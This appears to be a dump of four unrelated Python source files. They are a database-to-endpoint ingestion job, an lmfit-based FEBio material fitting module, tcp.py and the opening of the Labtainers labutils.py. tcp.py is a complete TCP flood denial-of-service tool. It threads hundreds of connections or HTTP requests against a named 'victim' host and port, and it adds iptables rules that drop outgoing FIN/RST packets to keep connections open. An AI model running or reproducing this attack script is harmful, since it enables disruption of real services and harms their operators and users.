excFname = 'endPointexceptions' + fnTime + '.txt'
# Get processing parameters
try:
postBatchSize = avoxUtils.getSysParam(6495, 'kapowPOSTBatchSize', 'NUMBER')
postProcesses = avoxUtils.getSysParam(6495, 'kapowPyProcesses', 'NUMBER')
except ParameterError as e:
avoxUtils.jobctl(dataIngestDefn.pType, 'FAIL')
print(e.msg)
# exit()
try:
endPoints = {}
jurisdictions = {}
avoxUtils.getEndpoints(endPoints, jurisdictions)
if len(endPoints) == 0:
print ('No endpoints found.')
avoxUtils.sendMail(localEnv.recipient, str(localEnv.tnsname) + ' No Endpoints found.',
'No Endpoints found in Application Lookups where lookup type is '
+ dataIngestDefn.endPointLkpType)
except Exception:
avoxUtils.jobctl(dataIngestDefn.pType, 'FAIL')
# Raise the exception
raise
#
# Now process the records waiting in the db
#
# Initialize the record arrays
insertArray = []
updateArray = []
excArray = []
tasklist = []
statelist = avoxUtils.getstatelist()
# Initialize the end point dictionary, this will be a dictionary of lists : {<lookup_id>:[<lists of endpoint urls>]}
epd = {}
try:
conn = cx_Oracle.connect(localEnv.dbUser, base64.b64decode(localEnv.dbUserPwd), localEnv.tnsname)
qry = conn.cursor()
# evt = dataIngestDefn.dbEvt + "_API"
bind = {'event': dataIngestDefn.dbEvt, 'rcount': postBatchSize}
qry.execute(
"SELECT * FROM (SELECT epi.cr_id, cr.status, epi.process_data, epi.epi_id \
FROM entity_propagate_internal epi, central_records cr \
WHERE epi.processed = 'N' AND epi.process_type = :event AND epi.cr_id = cr.cr_id \
ORDER BY record_creation_ts desc) \
WHERE rownum <=:rcount", bind)
# columns = [i[0] for i in qry.description]
for row in qry:
rowcount += 1
# Get the jurisdiction value of the record
record = row[2].read().split('^')
rCtry = record[4]
# We should look at only mapping state for countries with known jurisdictions at that level
# e.g. US,CA,AU,HK via the country code state list accounting for any name variations
prc = conn.cursor()
twoccc = prc.var(cx_Oracle.STRING)
states = prc.var(cx_Oracle.STRING)
# print(rCtry)
prc.callproc("map_country_name", [rCtry, twoccc, states])
# Check the mappings for this value
try:
if twoccc.getvalue() is None:
rJuris = None
raise CountryError(rCtry, 'No 2-char country mapping found.')
elif states.getvalue() == 'Y' and len(record[3]) > 0:
rJuris = twoccc.getvalue() + '-' + record[3].upper()
else:
rJuris = twoccc.getvalue().upper()
epJuris = jurisdictions[rJuris]
# This gives the lookup_id to use to get the list of endpoints
endpoint = endPoints[epJuris]
# If the list of endpoints haven't been loaded then fetch them
try:
urls = []
urls = epd[endpoint]
except Exception:
try:
epd[endpoint] = avoxUtils.getEPList(endpoint)
urls = epd[endpoint]
except Exception:
raise
# Add the process data into a dict and then dump into json
data = {"variableName": "company_in", "attribute": [{"type": "text", "name": "legal_name_search",
"value": record[0]}, {"type": "text", "name": "cr_id",
"value": str(row[0])}]}
jData = json.dumps({"parameters": [data]})
# Now post to each of the end point URLs
for endpoint in urls:
# print(endpoint)
if endpoint.endswith("robot"):
try:
#rs = requests.post(endpoint, data = jData, timeout=dataIngestDefn.httpTimeout)
#rs = requests.post(endpoint, headers=headers, data=jData, timeout=dataIngestDefn.httpTimeout, auth=HTTPBasicAuth(localEnv.kfUser, base64.b64decode(localEnv.kfUserPwd)))
tasklist.append((posttoendpoint, (row[0], endpoint, jData)))
#insertArray.append((row[0], dataIngestDefn.outboundEvt, row[1], datetime.datetime.now(), 0,
# dataIngestDefn.progName, datetime.datetime.now(), dataIngestDefn.pType, 1, 0, row[3],rs.status_code,endpoint))
#if rs.status_code > 299:
# print (rs.status_code)
# excArray.append((row[0], rJuris, "%s%s%s%s%s" % ("Received: ", str(rs.status_code), " from: ", endpoint, str(rs.content))))
except Exception, e:
# Log the error
excArray.append((row[0], rJuris, 'Error encountered for:' + endpoint + ' : ' + str(e)))
insertArray.append((row[0], dataIngestDefn.outboundEvt, row[1], datetime.datetime.now(), 0,
dataIngestDefn.progName, datetime.datetime.now(), dataIngestDefn.pType, 1,
0, row[3], 500, str(e)))
# Add the record to the update array
updateArray.append((row[0], dataIngestDefn.dbEvt))
# Call the endpoints via a queue and set of workers
# First create the task and return queues and add all the request calls to it
task_queue = Queue()
done_queue = Queue()
for task in tasklist:
task_queue.put(task, True)
# print ('Task Queue loaded at: ', datetime.datetime.now().strftime("%d%m%Y%H%M%S"))
except CountryError, e:
excArray.append((row[0], e.cname, e.msg))
updateArray.append((row[0], dataIngestDefn.dbEvt))
insertArray.append((row[0], dataIngestDefn.outboundEvt, row[1], datetime.datetime.now(), 0,
dataIngestDefn.progName, datetime.datetime.now(), dataIngestDefn.pType, 1, 0, row[3],
404, e.cname + ': ' + e.msg))
except Exception, e:
excArray.append((row[0], rJuris, 'Endpoint Mapping failed.'))
updateArray.append((row[0], dataIngestDefn.dbEvt))
insertArray.append((row[0], dataIngestDefn.outboundEvt, row[1], datetime.datetime.now(), 0,
dataIngestDefn.progName, datetime.datetime.now(), dataIngestDefn.pType, 1, 0, row[3],
404, str(e)))
if rowcount == commitunit:
print('time to run a batch...')
procs = []
# Start worker processes
print (postProcesses, ' Processes Starting at: ', datetime.datetime.now().strftime("%d%m%Y%H%M%S"))
for i in range(int(postProcesses)):
proc = Process(target=worker, args=(task_queue, done_queue))
procs.append(proc)
proc.start()
# Tell worker processes to stop
print "signal stop to workers..."
for i in range(int(postProcesses)):
task_queue.put('STOP', True)
time.sleep(0.1)
# Wait for the processes to finish and then finalize them
print "wait for workers to stop and tidy up..."
for p in procs:
p.join()
# Now dequeue all the results and add to the dml arrays
print "start dequeue of results..."
for i in range(len(tasklist)):
ret = done_queue.get(True)
time.sleep(0.1)
for x in range(len(ret)):
# Add return details to the log file and the db event log array
# print '\t', ret[x]
insertArray.append((ret[0], dataIngestDefn.outboundEvt, row[1], datetime.datetime.now(), 0,
dataIngestDefn.progName, datetime.datetime.now(), dataIngestDefn.pType, 1, 0,
row[3], ret[1], ret[2]))
# If the HTTP code isn't in the success range add it to the exception array
if ret[1] > 299:
# print (rs.status_code)
excArray.append((row[0], rJuris, "%s%s%s%s%s" % ("Received: ", str(ret[1]), " from: ", ret[2],
ret[3])))
# Reset the tasklist list
tasklist = []
insertLog(conn, insertArray)
#updateProcessed(conn, updateArray)
# Reset the insert array
insertArray = []
updateArray = []
# Write the exceptions to the file
if len(excArray) > 0:
excLogFile = open(excFname, 'a')
excLogFile.write(dataIngestDefn.excLogHdr + '\n')
for line in excArray:
excLogFile.write("%s%s%s%s%s%s" % (str(line[0]), "^", str(line[1]), "^", str(line[2]), "\n"))
# Reset the exceptions array
excArray = []
# Check the last batch of records
if len(insertArray) > 0:
print "run last batch..."
procs = []
# Start worker processes
print (postProcesses, ' Processes Starting at: ', datetime.datetime.now().strftime("%d%m%Y%H%M%S"))
for i in range(int(postProcesses)):
proc = Process(target=worker, args=(task_queue, done_queue))
procs.append(proc)
proc.start()
# Tell worker processes to stop
print "signal stop to workers..."
for i in range(int(postProcesses)):
task_queue.put('STOP', True)
time.sleep(0.1)
# Wait for the processes to finish and then finalize them
print "wait for workers to stop and tidy up..."
for p in procs:
p.join()
# Now dequeue all the results and add to the dml arrays
print "start dequeue of results..."
for i in range(len(tasklist)):
ret = done_queue.get(True)
time.sleep(0.1)
for x in range(len(ret)):
# Add return details to the log file and the db event log array
# print '\t', ret[x]
insertArray.append((ret[0], dataIngestDefn.outboundEvt, row[1], datetime.datetime.now(), 0,
dataIngestDefn.progName, datetime.datetime.now(), dataIngestDefn.pType, 1, 0, row[3],
ret[1], ret[2]))
# If the HTTP code isn't in the success range add it to the exception array
if ret[1] > 299:
# print (rs.status_code)
excArray.append((row[0], rJuris, "%s%s%s%s%s" % ("Received: ", str(ret[1]), " from: ", ret[2],
ret[3])))
# Reset the tasklist list
tasklist = []
insertLog(conn, insertArray)
# Commented for testing
#updateProcessed(conn, updateArray)
# Write the exceptions to the file
if len(excArray) > 0:
excLogFile = open(localEnv.LOG_DIR + '/' + excFname, 'a', 0)
excLogFile.write(dataIngestDefn.excLogHdr + '\n')
for line in excArray:
excLogFile.write(str(line[0]) + '^' + str(line[1]) + '^' + str(line[2]) + '\n')
except cx_Oracle.DatabaseError as e:
error, = e.args
avoxUtils.jobctl(dataIngestDefn.pType, 'FAIL')
if error.code == 1017:
print "Invalid credentials. Login failed."
else:
print(error)
#print "Database connection error: %s".format(e)
# Create log file and send email
logFile = open(localEnv.LOG_DIR + '/processRecords.log', 'w')
logFile.write('Database Error: ' + str(localEnv.tnsname) + '\n')
logFile.write(str(error.message))
logFile.close()
avoxUtils.sendMail(localEnv.recipient, str(localEnv.tnsname) + ' Database Error.',
'Database Error, see log file.', localEnv.LOG_DIR + '/processRecords.log')
except Exception, e:
print(e)
avoxUtils.jobctl(dataIngestDefn.pType, 'FAIL')
logFile = open(localEnv.LOG_DIR + '/processRecords.log', 'w')
logFile.write(str(e.message))
logFile.close()
avoxUtils.sendMail(localEnv.recipient, str(localEnv.tnsname) + ' Python Data Ingestion Error.',
'Unhandled Exception, see log file.', localEnv.LOG_DIR + '/processRecords.log')
# Ensure that we always disconnect from the database
finally:
qry.close()
conn.close()
if os.path.isfile(dataIngestDefn.lockFile):
os.remove(dataIngestDefn.lockFile)
if os.path.isfile(localEnv.LOG_DIR + '/' + excFname):
excLogFile.close()
avoxUtils.sendMail(localEnv.recipient, str(localEnv.tnsname) + ' Data Ingestion Endpoint Errors.',
'See attached file.', localEnv.LOG_DIR + '/' + excFname)
endtime = datetime.datetime.now()
avoxUtils.jobctl(dataIngestDefn.pType, 'SUCCESS')
print(endtime - starttime)
|
fit.py
|
"""
This module allows to execute flexible fitting procedures, with full control
of the fitting method, variables, calculations and experimental data formats.
# TODO
- The LMFIT library obtains the Jacobian through serial numerical approximations;
  when the residual function is expensive to evaluate, the fitting process becomes
  very slow. A parallel Jacobian calculation is implemented, but it is quite
  rudimentary, so it is disabled in the source code for now.
"""
import numpy as np
import lmfit
from scipy.interpolate import interp1d
import xml.etree.ElementTree as ET
import os
import subprocess
import threading
import sys
import time
from datetime import datetime
import psutil
from sklearn.metrics import r2_score
import interFEBio
from scipy.ndimage import interpolation
import signal
class _caso:
def __init__(self,modelName,matID,subFolder,expData,simFcn):
self.modelName = modelName
self.modelBinary = modelName.split('.feb')[0]+'.xplt'
self.matID = matID
self.subFolder = subFolder
self.expData = expData
self.current_directory = os.getcwd()
self.simFcn = simFcn
self.parameters = []
def addParameter(self,param):
self.parameters.append(param)
def writeCase(self,params,iter):
pars = dict(params.valuesdict())
originalTree = ET.parse(self.modelName)
tree = originalTree
root = tree.getroot()
for material in root.findall('.//material'):
if(material.attrib['id'] == str(self.matID) or material.attrib['name'] == str(self.matID)):
for const in material:
#print(const.tag, self.parameters)
if(const.tag in self.parameters):
#print(pars[const.tag])
const.text = '{:.20e}'.format(pars[const.tag])
#print(const.tag,const.text)
#print(os.path.join(self.current_directory, 'iter'+str(iter),self.subFolder))
tree.write(os.path.join(self.current_directory, 'iter'+str(iter),self.subFolder)+'/'+self.modelName,encoding='ISO-8859-1', xml_declaration=True)
# for p in pars.keys():
# if params[p].expr == None:
# tree = originalTree
# root = tree.getroot()
# for material in root.findall('.//material'):
# if(material.attrib['id'] == str(self.matID)):
# for const in material:
# #print(const.tag, self.parameters)
# if(const.tag in self.parameters and const.tag == p):
# #print(pars[const.tag])
# const.text = '{:.20e}'.format(pars[const.tag]*(1+0.05)/1000.0)
# if(const.tag in self.parameters and const.tag != p):
# const.text = '{:.20e}'.format(pars[const.tag]/1000.0)
# #print(const.tag,const.text)
# #print(os.path.join(self.current_directory, 'iter'+str(iter),self.subFolder))
# tree.write(os.path.join(self.current_directory, 'iter'+str(iter),self.subFolder,p)+'/'+self.modelName.split('.')[0]+'_'+p+".feb",encoding='ISO-8859-1', xml_declaration=True)
def verifyFolders(self,iter,p):
pars = dict(p.valuesdict())
iterDir = os.path.join(self.current_directory, 'iter'+str(iter))
if not os.path.exists(iterDir):
os.makedirs(iterDir)
simDir = os.path.join(iterDir, self.subFolder)
if not os.path.exists(simDir):
os.makedirs(simDir)
# for par in pars.keys():
# if p[par].expr == None:
# paramPath = os.path.join(simDir, par)
# if not os.path.exists(paramPath):
# os.makedirs(paramPath)
# def simToFunctions(self,iter,parameter):
# param = parameter.keys()
# stretch,stress = self.rawResults(iter,'')
# funSim = dict()
# funSim['fx'] = interp1d(stretch, stress,fill_value='extrapolate')
# for p in param:
# if parameter[p].expr == None:
# stretch,stress = self.rawResults(iter,p)
# funSim[p] = interp1d(stretch, stress,fill_value='extrapolate')
#
# return funSim
#
# def singleSimToFunction(self,iter):
# stretch,stress = self.rawResults(iter,'')
# funSim = interp1d(stretch, stress,fill_value='extrapolate')
# return funSim
def simResults(self,iter):
file = 'iter'+str(iter)+'/'+self.subFolder+'/'+self.modelBinary
x, y = self.simFcn(self,file)
np.savetxt(os.path.join(self.current_directory, 'iter'+str(iter),self.subFolder)+'/result.txt',np.transpose([x, y]))
return x, y
class fit:
'''
    Class that handles the numerical fitting algorithm.
    This class is based on the lmfit library.
'''
def __init__(self):
self.iter = 1
self.p = lmfit.Parameters()
self.mi = 0 #Used for saving fit results
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
current_date = datetime.today().strftime('%d-%m-%Y')
self.logfileName = 'log_'+current_date+'_'+current_time+'.txt'
self.len1 = dict()
signal.signal(signal.SIGINT, self._signal_handler)
self.pid = dict()
self.casos = dict()
self.exp = dict()
self.done = 0
self.thisIter = 0
self.disp1 = dict()
def addCase(self,name,matID,modelName,subFolder,expData,simFcn):
'''
Add a simulation to the fitting algorithm, including all the experimental data
and how to obtain numerical results for this xplt file.
Args:
----------
        name (str): Key used to identify this case within the fit.
        modelName (str): Name of the .feb model
        matID (int/str): id/name of the material to be fitted in that particular .feb file
        subFolder (str): Sub folder to store the simulation at each iteration.
        expData (np array): Array of x,y experimental data associated with the current simulation.
        simFcn (function): Function that handles the result calculation of the simulation. Needs to be written in terms of the xplt class functions.
'''
self.casos[name] = _caso(modelName,matID,subFolder,expData,simFcn)
def _updateParamList(self):
        #os.environ['OMP_NUM_THREADS'] = str(round(psutil.cpu_count()/2/(len(self.p.valuesdict())-1)))
self.parVals = self.p.valuesdict()
for key in self.parVals.keys():
for caso in self.casos:
self.casos[caso].addParameter(key)
def _run(self,caso,dh):
if(dh == ''):
p = subprocess.Popen(["febio3 -i "+self.casos[caso].modelName],shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT,cwd=os.path.join('iter'+str(self.iter),self.casos[caso].subFolder)+'/')
print("Running simulation "+os.path.join('iter'+str(self.iter),self.casos[caso].subFolder)+'/'+self.casos[caso].modelName+ ". PID: ",p.pid)
else:
p = subprocess.Popen(["febio3 -i "+self.casos[caso].modelName.split('.')[0]+'_'+dh+'.feb'],shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT,cwd=os.path.join('iter'+str(self.iter),self.casos[caso].subFolder,dh)+'/')
print("Running simulation "+os.path.join('iter'+str(self.iter),self.casos[caso].subFolder)+'/'+self.casos[caso].modelName.split('.')[0]+'_'+dh+'.feb'+ ". PID: ",p.pid)
self.pid[caso] = p.pid
p.communicate()
p.wait()
#sys.exit()
def _expToFunction(self):
self.expfcn = dict()
for caso in self.casos:
self.expfcn[caso] = interp1d(self.casos[caso].expData[:,0], self.casos[caso].expData[:,1],fill_value='extrapolate')
def _statistics(self,p):
parameters = dict(p.valuesdict())
self.r2 = dict()
for case in self.casos:
actual = self.expfcn[case](self.results[case][0])
predict = self.results[case][1]
R_sq = r2_score(actual, predict)
self.r2[case] = R_sq
self.logfile = open(self.logfileName, 'a')
self.logfile.write('iter '+str(self.iter)+'\t')
self.logfile.write(datetime.now().strftime("%H:%M:%S")+':\n')
self.logfile.write('\t'+'r2 = ')
self.logfile.write(str(self.r2))
self.logfile.write('\n')
self.logfile.write('\t'+'Parameters = ')
self.logfile.write(str(parameters))
self.logfile.write('\n')
self.logfile.close()
def _residual(self,p):
parameter = dict(p.valuesdict())
for caso in self.casos:
self.casos[caso].verifyFolders(self.iter,p)
self.casos[caso].writeCase(p,self.iter)
#if(self.thisIter != self.iter):
z = []
for caso in self.casos:
t = threading.Thread(target=self._run, args=(caso,''))
t.start()
z.append(t)
for t in z:
t.join()
# #sys.exit()
fun = dict()
residual = dict()
self._expToFunction()
self.results = dict()
totResid = []
totResid = np.array([])
for caso in self.casos:
x, y = self.casos[caso].simResults(self.iter)
if(self.iter == 1):
self.len1[caso] = len(x)
else:
if(len(x) != self.len1[caso]):
i = self.len1[caso]
z = i / len(x)
x = interpolation.zoom(x,z)
y = interpolation.zoom(y,z)
residual[caso] = -(self.expfcn[caso](x)-y)
self.results[caso] = [x,y]
#self.residual = residual
#totResid.append(residual[caso])
totResid = np.append(totResid,residual[caso])
self._statistics(p)
return totResid
def _per_iteration(self,pars, iter, resid, *args, **kws):
print(" ITER ", iter, [[i,pars.valuesdict()[i]] for i in pars.valuesdict()])
self.iter = iter+3
def optimize(self,**kwargs):
'''
Optimize.
        This function starts the optimization algorithm.
        The residual is calculated from the simulation (using the external function provided for each case) and compared with the experimental data provided.
kwargs:
----------
kwargs for the lmfit.minimize function.
>>> optimize(method='basinhopping')
'''
self._updateParamList()
self.mi = lmfit.minimize(self._residual,
self.p,
**dict(kwargs, iter_cb=self._per_iteration)
)
lmfit.printfuncs.report_fit(self.mi.params, min_correl=0.5)
print(lmfit.fit_report(self.mi))
def _signal_handler(self,sig, frame):
print()
print("***********************************")
print("***********************************")
print()
print('You pressed Ctrl+C!')
print("Killing the running simulations:")
print(self.pid)
print()
print("***********************************")
print("***********************************")
for key in self.pid:
try:
parent = psutil.Process(self.pid[key])
except:
continue
for child in parent.children(recursive=True): # or parent.children() for recursive=False
try:
child.kill()
except:
print("Child process no longer exists.")
continue
try:
parent.kill()
except:
print("Parent process no longer exists.")
continue
sys.exit(0)
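# --- Hedged usage sketch (illustrative only; file names, material id, parameter
# --- names and the result function below are assumptions, not part of this module) ---
#
# def uniaxial_results(case, xplt_file):
#     # Extract an (x, y) curve, e.g. stretch vs. stress, from the xplt binary.
#     # The exact calls depend on the interFEBio xplt API and are omitted here.
#     ...
#
# fitting = fit()
# fitting.p.add('c1', value=1.0, min=0.0)        # lmfit.Parameters().add()
# fitting.addCase('uniaxial', matID=1, modelName='uniaxial.feb',
#                 subFolder='uniaxial', expData=np.loadtxt('exp_uniaxial.txt'),
#                 simFcn=uniaxial_results)
# fitting.optimize(method='leastsq')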
|
tcp.py
|
#!/usr/local/bin/python
# coding: latin-1
# Someone is watchin' at the script... Don't worry, it's alright if u dont touch anything :)
# - Retr0
"""
▒██ ██▒ █████▒▒█████ ██▀███ █ █░ ▒█████ ██▀███ ██ ▄█▀ ██████
▒▒ █ █ ▒░▓██ ▒▒██▒ ██▒▓██ ▒ ██▒▓█░ █ ░█░▒██▒ ██▒▓██ ▒ ██▒ ██▄█▒ ▒██ ▒
░░ █ ░▒████ ░▒██░ ██▒▓██ ░▄█ ▒▒█░ █ ░█ ▒██░ ██▒▓██ ░▄█ ▒▓███▄░ ░ ▓██▄
░ █ █ ▒ ░▓█▒ ░▒██ ██░▒██▀▀█▄ ░█░ █ ░█ ▒██ ██░▒██▀▀█▄ ▓██ █▄ ▒ ██▒
▒██▒ ▒██▒░▒█░ ░ ████▓▒░░██▓ ▒██▒░░██▒██▓ ░ ████▓▒░░██▓ ▒██▒▒██▒ █▄▒██████▒▒
▒▒ ░ ░▓ ░ ▒ ░ ░ ▒░▒░▒░ ░ ▒▓ ░▒▓░░ ▓░▒ ▒ ░ ▒░▒░▒░ ░ ▒▓ ░▒▓░▒ ▒▒ ▓▒▒ ▒▓▒ ▒ ░
░░ ░▒ ░ ░ ░ ▒ ▒░ ░▒ ░ ▒░ ▒ ░ ░ ░ ▒ ▒░ ░▒ ░ ▒░░ ░▒ ▒░░ ░▒ ░ ░
░ ░ ░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
"""
import socket
from time import sleep
from threading import Thread, active_count
from os import *
import random
import string
import signal
import ssl
import argparse
import sys
example_text = ''' \nTips: Target page with 1500+ bytes size.
example:
python %s example.com/test.php -p 80 -http
python %s example.com/hello/ -p 443 -ssl -http
python %s example.com -p 80 -http
python %s example.com -p 21 -payload 68656c6c6f
python %s example.com -p 22
Connects - TCP handshakes towards victim
Payloads - Recevied payloads by victim
Dropped - TCP handshakes or payloads rejected by victim (site down)
''' % (sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0])
parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawTextHelpFormatter)
parser._action_groups.pop()
required = parser.add_argument_group('required arguments')
optional = parser.add_argument_group('optional arguments')
required.add_argument('target', help='Specify a target to attack')
required.add_argument('-p', dest='port', help='Specify port to attack', type=int, required=True)
optional.add_argument('-t', dest='THREADS', type=int, default=300, help='Threads, default = 300 threads')
optional.add_argument('-ssl', action='store_true', help='Enable SSL')
optional.add_argument('-http', action='store_true', help='Enable HTTP headers (only if custom payload not set)')
optional.add_argument('-payload', help='Set payload as hex-string')
print("\ntcp flood.\n")
args = parser.parse_args()
connected = 0
dropped = 0
payloads = 0
port = args.port
# Sort out http URI in targets
target = args.target.replace('http://','').replace('https://','')
if '/' in target and args.http:
path = target[target.find('/'):]
target = target[:target.find('/')]
else:
path = '/'
# Decode custom payload
try:
if args.payload:
payload = args.payload.decode('hex')
else:
payload = ''
except:
print('Use hex string format as payload.')
sys.exit()
# Check if script is running as root
if geteuid() != 0:
print("Run %s as root." % sys.argv[0])
sys.exit()
# Catch CTRL+C to abort
stop = False
def signal_handler(signal, frame):
global stop
stop = True
signal.signal(signal.SIGINT, signal_handler)
# String generator for Cache bypassing on load balancers (Random letters in lenght 3 to 8)
def string_generator(size=random.randint(3, 8), chars=string.ascii_uppercase + string.ascii_lowercase):
return ''.join(random.choice(chars) for _ in range(size))
# Generate HTTP Payload
def http_payload():
payload = 'GET %s?%s HTTP/1.1\r\n' % (path, string_generator())
payload += 'Host: %s\r\n' % target
payload += 'User-Agent: Kittenz Launcher!!!\r\n'
payload += 'Connection: keep-alive\r\n\r\n'
return payload
# DOS function
def spam(target_ip, payload):
global connected, dropped, payloads
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 2 sec TCP timeout
s.settimeout(2)
try:
s.connect((target_ip, port))
connected += 1
# Wrap connection with SSL if specified
if args.ssl:
s = ssl.wrap_socket(s, cert_reqs = ssl.CERT_NONE)
if args.http and not args.payload:
payload = http_payload()
s.send(payload)
payloads += 1
s.close()
except:
dropped += 1
if stop == True:
break
if __name__ == '__main__':
target_ip = socket.gethostbyname(target)
# add IP tables to drop FIN and RST packets towards TARGET
system('iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP' %( target_ip, port ))
system('iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags RST RST -j DROP' %( target_ip, port ))
# Fire up threads running spam() function
threads = []
for i in range(args.THREADS):
t = Thread(target=spam, args=(target_ip, payload,))
threads.append(t)
t.start()
while True:
# Keep going until ctrl+c is pressed
if active_count() == 1 or stop == True:
# when ctrl+c is pressed, restore IP tables.
system('iptables -D OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP' %( target_ip, port ))
system('iptables -D OUTPUT -d %s -p tcp --dport %d --tcp-flags RST RST -j DROP' %( target_ip, port ))
print("")
break
else:
sleep(0.1)
sys.stdout.write('Connects: %d, Payloads: %d, Dropped: %d \r' % (connected, payloads, dropped))
sys.stdout.flush()
# Really intrigued by the script huh? You looked at the whole thing...
# Do u even have a life? Kiddin' LOL
# - Retr0
|
labutils.py
|
'''
This software was created by United States Government employees at
The Center for Cybersecurity and Cyber Operations (C3O)
at the Naval Postgraduate School NPS. Please note that within the
United States, copyright protection is not available for any works
created by United States Government employees, pursuant to Title 17
United States Code Section 105. This software is in the public
domain and is not subject to copyright.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import filecmp
import glob
import json
import hashlib
from hashlib import md5
import os
import shutil
import re
import subprocess
import sys
import time
import zipfile
import ParseStartConfig
import ParseLabtainerConfig
import datetime
import getpass
import socket
import fcntl
import struct
import threading
import LabCount
import shlex
import stat
import traceback
import string
import errno
import registry
import dockerPull
''' assumes relative file positions '''
here = os.path.dirname(os.path.abspath(__file__))
lab_bin_dir = os.path.join(here, '../lab_bin')
sys.path.append(lab_bin_dir)
import ParameterParser
import InspectLocalReg
import InspectRemoteReg
''' logger is defined in whatever script that invokes the labutils '''
global logger
# Error code returned by docker inspect
SUCCESS=0
FAILURE=1
'''
Version number embeded as a label into each docker image.
Current framework version (per below) must be at least
what is found in the image. This is only used for
framework/image compatibility, to tell a user that a given
lab cannot be run without doing an update.
'''
framework_version = 3
osTypeMap = {}
networkImages = []
# Create a directory path based on input path
# Note: Do not create if the input path already exists as a directory
# If input path is a file, remove the file then create directory
def createDirectoryPath(input_path):
# if it exist as a directory, do not delete (only delete if it is a file)
if os.path.exists(input_path):
# exists but is not a directory
if not os.path.isdir(input_path):
# remove file then create directory
os.remove(input_path)
os.makedirs(input_path)
#else:
# logger.debug("input_path directory (%s) exists" % input_path)
else:
# does not exists, create directory
os.makedirs(input_path)
def isValidLab(lab_path):
# Lab path must exist and must be a directory
if os.path.exists(lab_path) and os.path.isdir(lab_path):
# Assume it is valid lab then
#logger.debug("lab_path directory (%s) exists" % lab_path)
pass
else:
logger.error("Invalid lab! lab_path directory (%s) does not exist!" % lab_path)
#traceback.print_exc()
#traceback.print_stack()
sys.exit(1)
def getFirstUnassignedIface(n=1):
    ''' get the nth network interface that lacks an assigned IP address '''
    iflist = os.listdir('/sys/class/net')
    count = 1
    for iface in sorted(iflist):
        ip = get_ip_address(iface)
        if ip is None:
            if count == n:
                return iface
            # only count interfaces that lack an address
            count += 1
    return None
def get_ip_address(ifname):
    ''' return the IPv4 address assigned to the named interface, or None '''
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sp = struct.pack('256s', str.encode(ifname[:15]))
    try:
        # 0x8915 is the SIOCGIFADDR ioctl; the returned ifreq structure holds
        # the 4-byte IPv4 address at offset 20
        fc = fcntl.ioctl(s.fileno(), 0x8915, sp)
    except:
        return None
    return socket.inet_ntoa(fc[20:24])
def get_hw_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if sys.version_info >=(3,0):
try:
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', bytes(ifname, 'utf-8')[:15]))
return ':'.join('%02x' % b for b in info[18:24])
except:
return None
else:
try:
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', str(ifname[:15])))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
except:
return None
def get_new_mac(ifname):
    ''' use the last two bytes of the mac address to generate a new mac,
        intended for use on macvlan '''
# TBD move this hardcoded prefix into some config file?
preface = '02:43:ac:12'
my_mac = get_hw_address(ifname)
parts = my_mac.split(':')
p1 = parts[4]
p2 = parts[5]
full = '%s:%s:%s' % (preface, p1, p2)
return full
def isalphadashscore(name):
# check name - alphanumeric,dash,underscore
return re.match(r'^[a-zA-Z0-9_-]*$', name)
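# Illustrative usage: isalphadashscore('telnet_lab-1') matches, while a name
# containing a dot or space (e.g. 'telnet lab') returns None.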
# get docker0 IP address
def getDocker0IPAddr():
#return get_ip_address('docker0')
cmd = "docker inspect -f '{{ .NetworkSettings.IPAddress }}' docker0"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) == 0:
''' is a docker0 master container '''
if len(output[0].strip()) > 0:
return output[0].decode('utf-8').strip()
else:
return None
else:
return get_ip_address('docker0')
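# Illustrative result (value is hypothetical): typically the docker0 bridge
# address, e.g. '172.17.0.1'; whatever is returned is passed to each container
# via the '--add-host my_host:<addr>' flag in CreateSingleContainer below.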
# Parameterize my_container_name container
def ParameterizeMyContainer(mycontainer_name, mycontainer_image_name, container_user, container_password, lab_instance_seed,
user_email, labname, lab_path, name, image_info, running_container=None):
retval = True
if running_container == None:
running_container = mycontainer_name
''' copy lab_bin and lab_sys files into .local/bin and / respectively '''
CopyLabBin(running_container, mycontainer_image_name, container_user, lab_path, name, image_info)
cmd = 'docker exec %s script -q -c "chown -R %s:%s /home/%s"' % (mycontainer_name, container_user, container_user, container_user)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
